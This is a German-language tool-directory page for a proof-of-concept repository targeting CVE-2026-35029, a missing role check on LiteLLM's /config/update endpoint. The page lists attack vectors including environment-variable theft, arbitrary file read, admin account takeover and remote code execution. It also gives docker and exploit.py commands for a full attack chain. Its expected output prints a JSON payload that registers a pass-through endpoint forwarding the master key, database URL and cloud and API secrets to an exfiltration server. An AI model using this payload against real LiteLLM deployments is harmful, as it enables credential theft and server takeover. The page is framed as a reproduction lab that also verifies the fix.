Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-35029-PoC — Der Code zur persönlichen Reproduktion der entsprechenden Schwachstelle | Kitploit
Tools/GitHubGitHub/learner202649/cve-2026-35029-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationPenetrationstestsLernen & BildungLabs & Praxis
GitHublearner202649/cve-2026-35029-poc

CVE-2026-35029-PoC

Der Code zur persönlichen Reproduktion der entsprechenden Schwachstelle

Repository anzeigen
12vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-35029 — LiteLLM /config/update Schwachstelle für unbefugten Zugriff (Broken Access Control)

Der /config/update-Endpunkt von LiteLLM prüft die Rollenberechtigungen des Aufrufers nicht. Jeder authentifizierte Benutzer mit einem gültigen API-Key (ohne Administratorrechte) kann die Proxy-Konfiguration ändern und bösartige Pass-Through-Endpunkte registrieren, um Angriffe wie Stehlen von Umgebungsvariablen, Lesen beliebiger Dateien und Remote Code Execution durchzuführen.

FeldWert
CVECVE-2026-35029
CVSS v4.08.7 (HOCH) — CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N
CVSS v3.18.8 (HOCH) — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWECWE-863 (Incorrect Authorization) / CWE-285 (Improper Authorization)
BetroffenLiteLLM < 1.83.0
Behobenv1.83.0+ (hat die proxy_admin-Rollenprüfung für /config/update hinzugefügt)
Veröffentlicht2026-04-06
Entdeckt vonTimo Müller — SEC Consult Vulnerability Lab (München)
Gefunden2026-02-24
LinksGHSA-53mr-6c8q-9789 • NVD • SEC Consult

Beschreibung

Der /config/update-Endpunkt von LiteLLM sollte eigentlich nur von der Rolle proxy_admin aufgerufen werden dürfen, aber vor v1.83.0 gab es keinerlei Rollenprüfung. Jeder Benutzer mit einem gültigen API-Key konnte diesen Endpunkt aufrufen.

Angriffsvektoren

AngriffstypBeschreibung
Stehlen von UmgebungsvariablenRegistriert Pass-Through-Endpunkte und stiehlt über os.environ/VAR_NAME-Header-Referenzen DATABASE_URL, LITELLM_MASTER_KEY usw.
Lesen beliebiger DateienNutzt die Base64-Kodierung der LANGFUSE_*-Header aus, um das Server-Dateisystem zu lesen
KonfigurationsmanipulationÜberschreibt UI_USERNAME und UI_PASSWORD, um das Administratorkonto zu übernehmen
Remote Code ExecutionRegistriert Pass-Through-Endpunkt-Handler, die auf Python-Code des Angreifers verweisen

Auswirkungen

  • Benutzer mit niedrigen Berechtigungen → volle Administratorrechte
  • Offenlegung sensibler Umgebungsvariablen (Datenbank-Anmeldedaten, API-Schlüssel, Cloud-Anmeldedaten)
  • Lesen beliebiger Dateien (Konfigurationsdateien, Zertifikate, Shadow-Dateien)
  • Kann mit anderen Schwachstellen (CVE-2026-35030) zu einer Angriffskette kombiniert werden

Proof of Concept

Schnellstart (Docker)

⚠️ Wichtig: Die docker-compose.yml legt das anfällige Image auf einen bestimmten Digest fest (sha256:5beb4ea6...) vom 24. Januar 2026. Ändern Sie es nicht auf main-v1.81.0-stable oder ein anderes veränderliches Tag — spätere Images könnten mit Fixes neu erstellt worden sein, was die Reproduktion verhindert.

# 1. 启动脆弱版 LiteLLM + 攻击者数据接收服务器
docker compose up -d

# 2. 安装依赖
pip install -r requirements.txt

# 3. 运行完整攻击链(环境变量窃取 + 文件读取)
python3 exploit/exploit.py --mode full-chain \
  --target http://localhost:4000 \
  --key sk-litellm-master-key

# 4. 仅窃取环境变量
python3 exploit/exploit.py --mode exfil \
  --target http://localhost:4000 \
  --key sk-litellm-master-key

# 5. (可选)验证修复版本不受影响
docker compose --profile fixed up -d
python3 exploit/exploit.py --mode full-chain \
  --target http://localhost:4001 \
  --key sk-litellm-master-key --fixed

Hinweis: Beim ersten Start der Container ca. 30–60 s warten (PostgreSQL-Healthcheck + Prisma-Datenbankmigration), bis in den Container-Logs Uvicorn running on http://0.0.0.0:4000 erscheint, bevor Sie den Exploit ausführen.

Erwartete Ausgabe

Stehlen von Umgebungsvariablen:

======================================================================
[VULNERABLE] Phase 1: Environment Variable Exfiltration
======================================================================

[*] Step 1: Registering pass-through endpoint via /config/update...
    Payload: {
        "general_settings": {
            "pass_through_endpoints": [
                {
                    "path": "/exfil/env",
                    "target": "http://exfil-server:9999/collect",
                    "headers": {
                        "X-Exfil-1-LITELLM_MASTER_KEY": "os.environ/LITELLM_MASTER_KEY",
                        "X-Exfil-2-DATABASE_URL": "os.environ/DATABASE_URL",
                        "X-Exfil-3-AWS_SECRET_ACCESS_KEY": "os.environ/AWS_SECRET_ACCESS_KEY",
                        "X-Exfil-4-OPENAI_API_KEY": "os.environ/OPENAI_API_KEY"
                    }
                }
            ]
        }
    }
    HTTP 200
    [+] Config update accepted!

[*] Step 2: Waiting for pass-through route propagation...
    6 seconds...

[*] Step 3: Triggering pass-through endpoint at /exfil/env...
    HTTP 200
    Response: {"status":"received","message":"Data captured by exfiltration server"}

[*] Step 4: Checking exfiltration server for stolen data...

[🔥] EXFILTRATION LOGS:
────────────────────────────────────────────────────────────
📥 Request received
   Path  : /collect
   Headers:
     X-Exfil-1-LITELLM_MASTER_KEY: sk-litellm-master-key
     X-Exfil-2-DATABASE_URL: postgresql://admin:[email protected]:5432/production
     X-Exfil-3-AWS_SECRET_ACCESS_KEY: AKIA1234567890EXAMPLE
     X-Exfil-4-OPENAI_API_KEY: sk-openai-secret-key-leaked

[🔥] EXPLOIT SUCCEEDED! Sensitive data exfiltrated!

Behobene Version verweigert den Zugriff (mit nicht-administrativem Key wird 403 zurückgegeben):

======================================================================
[FIXED] Phase 1: Environment Variable Exfiltration
======================================================================
    HTTP 403
    [-] Forbidden — target may be patched (v1.83.0+)
    [+] Expected: fixed version blocks non-admin config updates

Hinweis: Wenn Sie die behobene Version mit dem Master Key (sk-litellm-master-key) testen, gibt die Konfigurationsaktualisierung weiterhin HTTP 200 zurück (der Master Key besitzt die Rolle proxy_admin), die Registrierung des Pass-Through-Endpunkts wird jedoch möglicherweise nicht wirksam oder stillschweigend ignoriert. Es wird empfohlen, die Behebung mit einem nicht-administrativen Key zu verifizieren.


Angriffskette im Detail

Tool herunterladen